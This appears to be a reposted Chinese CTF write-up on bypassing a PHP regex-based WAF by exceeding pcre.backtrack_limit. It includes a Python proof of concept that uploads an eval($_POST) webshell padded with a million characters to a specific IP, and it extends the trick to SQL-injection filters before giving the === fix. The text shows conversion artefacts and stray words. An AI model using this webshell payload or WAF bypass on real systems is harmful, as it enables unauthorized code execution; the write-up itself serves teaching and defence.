此次Code-Breaking Puzzles中我出了一道看似很简单的题目pcrewaf,将其代码简化以下:php
<?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is', $data); } if(!is_php($input)) { // fwrite($f, $input); ... }
大意是判断一下用户输入的内容有没有PHP代码,若是没有,则写入文件。这种时候,如何绕过is_php()
函数来写入webshell呢?html
这道题看似简单,深究其原理,仍是值得写一篇文章的。web
正则表达式是一个能够被“有限状态自动机”接受的语言类。正则表达式
“有限状态自动机”,其拥有有限数量的状态,每一个状态能够迁移到零个或多个状态,输入字串决定执行哪一个状态的迁移。shell
而常见的正则引擎,又被细分为DFA(肯定性有限状态自动机)与NFA(非肯定性有限状态自动机)。他们匹配输入的过程分别是:函数
因为NFA的执行过程存在回溯,因此其性能会劣于DFA,但它支持更多功能。大多数程序语言都使用了NFA做为正则引擎,其中也包括PHP使用的PCRE库。post
因此,咱们题目中的正则<\?.*[(`;?>].*
,假设匹配的输入是<?php phpinfo();//aaaaa
,实际执行流程是这样的:性能
见上图,可见第4步的时候,由于第一个.*
能够匹配任何字符,因此最终匹配到了输入串的结尾,也就是//aaaaa
。但此时显然是不对的,由于正则显示.*
后面还应该有一个字符[(`;?>]
。调试
因此NFA就开始回溯,先吐出一个a
,输入变成第5步显示的//aaaa
,但仍然匹配不上正则,继续吐出a
,变成//aaa
,仍然匹配不上……rest
最终直到吐出;
,输入变成第12步显示的<?php phpinfo()
,此时,.*
匹配的是php phpinfo()
,然后面的;
则匹配上[(`;?>]
,这个结果知足正则表达式的要求,因而再也不回溯。13步开始向后匹配;
,14步匹配.*
,第二个.*
匹配到了字符串末尾,最后结束匹配。
在调试正则表达式的时候,咱们能够查看当前回溯的次数:
这里回溯了8次。
pcre.backtrack_limit
限制利用PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit
。咱们能够经过var_dump(ini_get('pcre.backtrack_limit'));
的方式查看当前环境下的上限:
这里有个有趣的事情,就是PHP文档中,中英文版本的数值是不同的:
咱们应该以英文版为参考。
可见,回溯次数上限默认是100万。那么,假设咱们的回溯次数超过了100万,会出现什么现象呢?好比:
可见,preg_match
返回的非1和0,而是false。
preg_match
函数返回false表示这次执行失败了,咱们能够调用var_dump(preg_last_error() === PREG_BACKTRACK_LIMIT_ERROR);
,发现失败的缘由的确是回溯次数超出了限制:
因此,这道题的答案就呼之欲出了。咱们经过发送超长字符串的方式,使正则执行失败,最后绕过目标对PHP语言的限制。
对应的POC以下:
import requests from io import BytesIO files = { 'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000) } res = requests.post('http://51.158.75.42:8088/index.php', files=files, allow_redirects=False) print(res.headers)
延伸一下,不少基于PHP的WAF,如:
<?php if(preg_match('/SELECT.+FROM.+/is', $input)) { die('SQL Injection'); }
均存在上述问题,经过大量回溯能够进行绕过。
另外,我遇到更常见的一种WAF是
<?php if(preg_match('/UNION.+?SELECT/is', $input)) { die('SQL Injection'); }
这里涉及到了正则表达式的“非贪婪模式”。在NFA中,若是我输入UNION/*aaaaa*/SELECT
,这个正则表达式执行流程以下:
.+?
匹配到/
.+?
中止匹配,而由S
匹配*
S
匹配*
失败,回溯,再由.+?
匹配*
.+?
中止匹配,而由S
匹配a
S
匹配a
失败,回溯,再由.+?
匹配a
回溯次数随着a的数量增长而增长。因此,咱们仍然能够经过发送大量a,来使回溯次数超出pcre.backtrack_limit
限制,进而绕过WAF:
那么,如何修复这个问题呢?
其实若是咱们仔细观察PHP文档,是能够看到preg_match
函数下面的警告的:
若是用preg_match
对字符串进行匹配,必定要使用===
全等号来判断返回值,如:
<?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is', $data); } if(is_php($input) === 0) { // fwrite($f, $input); ... }
这样,即便正则执行失败返回false,也不会进入if语句
来自p神文章:
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html?page=1#reply-list